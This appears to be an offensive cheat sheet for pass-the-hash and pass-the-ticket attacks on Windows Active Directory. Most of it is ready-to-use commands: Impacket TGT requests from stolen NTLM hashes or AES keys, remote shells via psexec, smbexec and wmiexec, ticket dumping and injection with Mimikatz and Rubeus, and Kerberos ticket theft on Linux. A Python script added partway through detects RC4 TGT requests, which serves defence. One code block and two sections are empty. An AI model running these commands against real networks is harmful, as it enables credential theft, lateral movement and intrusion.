# Use Alternate Authentication Material

## Application Access Token

## Pass the Hash

### Overpass The Hash/Pass The Key (PTK)

#### Impacket

Request the TGT with hash

```
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
```

Request the TGT with an AES key (more secure encryption, and probably stealthier because it is the type Microsoft uses by default)

```
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
```

Request the TGT with password

```
python getTGT.py <domain_name>/<user_name>:[password]
```

Set the TGT for impacket use

```
export KRB5CCNAME=<TGT_ccache_file>
```

Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### Rubeus and PsExec

Ask and inject the ticket

```
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
```

Execute a cmd in the remote machine

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```
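
The remark above that AES is the default encryption type gives defenders a signal: where AES is the norm, a successful TGT request (Event ID 4768) whose `TicketEncryptionType` is `0x17` (RC4-HMAC) stands out. This is an added detection example, not part of the original page; the JSON-lines export format, the sample events and the `svc_legacy` allowlist entry are constructed assumptions.

```python
import json

# Kerberos etype numbers as they appear in the TicketEncryptionType field.
ETYPE_NAMES = {0x11: "AES128-CTS-HMAC-SHA1-96",
               0x12: "AES256-CTS-HMAC-SHA1-96",
               0x17: "RC4-HMAC"}
RC4_HMAC = 0x17

# Constructed sample: 4768/4769 events as JSON lines (export format is an assumption).
SAMPLE_EVENTS = """\
{"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.21", "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "bob", "IpAddress": "::ffff:10.0.0.66", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "svc_legacy", "IpAddress": "::ffff:10.0.0.30", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "carol", "IpAddress": "::ffff:10.0.0.22", "TicketEncryptionType": "0xFFFFFFFF", "Status": "0x6"}
{"EventID": 4769, "TargetUserName": "bob", "IpAddress": "::ffff:10.0.0.66", "TicketEncryptionType": "0x17", "Status": "0x0"}
not-json garbage line
"""


def find_rc4_tgt_requests(lines, allowlist=()):
    """Return (user, source_ip, etype_name) for each successful RC4 TGT request."""
    allowed = {name.lower() for name in allowlist}  # accounts known to still need RC4
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
            etype = int(str(event["TicketEncryptionType"]), 16)
        except (ValueError, KeyError, TypeError):
            continue  # skip malformed or incomplete records
        if event.get("EventID") != 4768 or event.get("Status") != "0x0":
            continue  # keep only successfully issued TGTs
        user = str(event.get("TargetUserName", "")).lower()
        if etype != RC4_HMAC or user in allowed:
            continue
        ip = str(event.get("IpAddress", ""))
        if ip.startswith("::ffff:"):  # IPv4-mapped form used in these events
            ip = ip[len("::ffff:"):]
        findings.append((user, ip, ETYPE_NAMES[etype]))
    return findings


if __name__ == "__main__":
    hits = find_rc4_tgt_requests(SAMPLE_EVENTS.splitlines(), allowlist=["svc_legacy"])
    for user, ip, etype in hits:
        print(f"RC4 TGT request: user={user} source={ip} etype={etype}")
```

A request made with an AES key does not trip this check, so it complements rather than replaces correlation of 4768 events with the source host and logon activity.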

## Pass the Ticket

### Pass The Ticket (PTT)

#### Harvest tickets from Linux

* Check type and location of tickets:

  ```
  grep default_ccache_name /etc/krb5.conf
  ```
* If nothing is returned, the default is `FILE:/tmp/krb5cc_%{uid}`.
* For file tickets, you can copy them (if you have permissions) and use them.
* For `KEYRING` tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```
cp tickey /tmp/tickey
```

```
/tmp/tickey -i
```

#### Harvest tickets from Windows

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in PowerShell:

```
.\Rubeus dump
```

After dumping tickets with Rubeus in base64, write them to a file:

```
```

To convert tickets between Linux/Windows format with [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter):

```
python ticket_converter.py ticket.kirbi ticket.ccache
```

```
python ticket_converter.py ticket.ccache ticket.kirbi
```

#### Using ticket in Linux

Set the ticket for impacket use

```
export KRB5CCNAME=<TGT_ccache_file_path>
```

Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### Using ticket in Windows

Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Web Session Cookie
